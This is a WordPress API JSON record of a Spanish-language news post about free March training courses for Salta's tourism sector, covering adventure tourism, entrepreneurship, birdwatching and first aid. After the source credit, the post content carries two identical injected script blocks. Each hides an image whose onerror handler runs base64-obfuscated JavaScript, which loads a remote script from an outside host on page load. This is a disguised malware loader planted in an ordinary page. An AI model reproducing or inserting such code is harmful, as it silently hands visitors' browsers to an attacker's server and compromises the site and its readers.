{"id":3847,"date":"2024-03-11T11:58:09","date_gmt":"2024-03-11T14:58:09","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3847"},"modified":"2025-08-13T23:58:40","modified_gmt":"2025-08-14T02:58:40","slug":"capacitaciones-para-el-sector-turistico-durante-marzo","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3847","title":{"rendered":"Capacitaciones para el sector tur\u00edstico durante marzo"},"content":{"rendered":"\n<h3 class=\"wp-block-heading has-white-color has-text-color has-background has-link-color wp-elements-9e2953a998917b3f67c63219a3a42883\" style=\"background-color:#8a0d4d\"><em>El sector p\u00fablico y privado puede acceder durante el corriente mes a capacitaci\u00f3n gratuita de manera presencial, virtual o asincr\u00f3nica.<\/em><\/h3>\n\n\n\n<p>El Ministerio de Turismo y Deportes de Salta, en el marco del&nbsp;<em>Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible<\/em>, pone a disposici\u00f3n del sector p\u00fablico y privado del \u00e1mbito tur\u00edstico, cursos gratuitos de modalidad presencial, virtual y asincr\u00f3nica. Para informes e inscripciones dirigirse a capacitacion@turismosalta.gov.ar.<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 13<\/strong><\/p>\n\n\n\n<p>\u00bfQuer\u00e9s ser parte del Turismo Aventura en Salta? el Ministerio de Turismo y Deportes junto a la Asociaci\u00f3n de Productores Asesores de Seguros de Salta (APASS) dictar\u00e1n este curso virtual destinado a los Prestadores de Turismo Aventura.<\/p>\n\n\n\n<p>Durante este mes se publicar\u00e1n cursos virtuales desarrollados y grabados en a\u00f1os anteriores, para que, de manera asincr\u00f3nica, bajo la modalidad \u00abon demand\u00bb, la comunidad tur\u00edstica pueda disponer de contenidos de su inter\u00e9s y aprender de la mejor manera:&nbsp;<\/p>\n\n\n\n<p><strong>Jueves 14<\/strong>: Despertando el gen emprendedor, a cargo de Cecilia Camou, dirigido a emprendedores tur\u00edsticos.<\/p>\n\n\n\n<p><strong>Martes 19<\/strong>: Herramientas inform\u00e1ticas para mejorar la atenci\u00f3n al visitante. Modulo I, a cargo de Carlos Riob\u00f3, dirigido a informantes tur\u00edsticos<\/p>\n\n\n\n<p><strong>Jueves 21<\/strong>: Nuevos productos y alianzas estrat\u00e9gicas, a cargo de Cecilia Camou, dirigido a emprendedores tur\u00edsticos<\/p>\n\n\n\n<p><strong>Martes 26<\/strong>: Herramientas inform\u00e1ticas para mejorar la atenci\u00f3n al visitante. M\u00f3dulo II, a cargo de Carlos Riob\u00f3, dirigido a informantes tur\u00edsticos<\/p>\n\n\n\n<p><strong>Mi\u00e9rcoles 27<\/strong>: Herramientas de Promoci\u00f3n y comercializaci\u00f3n, a cargo de Cecilia Camou, destinado a emprendedores tur\u00edsticos<\/p>\n\n\n\n<p><strong>Jueves 14 y viernes 15<\/strong><\/p>\n\n\n\n<p>Iniciaci\u00f3n a la Observaci\u00f3n de Aves. La capacitaci\u00f3n dirigida a gu\u00edas y prestadores de Turismo Aventura que quieran iniciarse en la actividad, estar\u00e1 a cargo de Felipe Usandivaras del Ministerio de Turismo y Deportes y Soledad Gonz\u00e1lez del Parque Bicentenario.<\/p>\n\n\n\n<p><strong>Jueves 21<\/strong>: El curso Primeros Auxilios nivel I y II, destinado a gu\u00edas y prestadores del sector tur\u00edstico de Salta Capital, estar\u00e1 a cargo del Dr. Rodolfo Pastore<\/p>\n\n\n\n<p><strong>Viernes 22<\/strong>: El curso Primeros Auxilios nivel I y II destinado a prestadores del sector tur\u00edsticos de Campo Quijano estar\u00e1 a cargo del Dr. Rodolfo Pastore.<\/p>\n\n\n\n<hr class=\"wp-block-separator has-alpha-channel-opacity\"\/>\n\n\n\n<p>Fuente:\u00a0<strong><a href=\"https:\/\/www.salta.gob.ar\/prensa\/noticias\/capacitaciones-para-el-sector-turistico-durante-marzo-94567\" target=\"_blank\" rel=\"noopener\" title=\"\">Secretar\u00eda de Prensa y Comunicaci\u00f3n<\/a><\/strong><\/p>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El sector p\u00fablico y privado puede acceder durante el corriente mes a capacitaci\u00f3n gratuita de manera presencial, virtual o asincr\u00f3nica. El Ministerio de Turismo y Deportes de Salta, en el marco del&nbsp;Plan Integral de Capacitaci\u00f3n: Hacia un destino sostenible, pone a disposici\u00f3n del sector p\u00fablico y privado del \u00e1mbito tur\u00edstico, cursos gratuitos de modalidad presencial, [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3848,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[11,17],"tags":[],"class_list":{"0":"post-3847","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-datos-utiles","8":"category-sociales"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3847"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3847"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3847\/revisions"}],"predecessor-version":[{"id":6825,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3847\/revisions\/6825"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3848"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3847"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3847"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3847"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}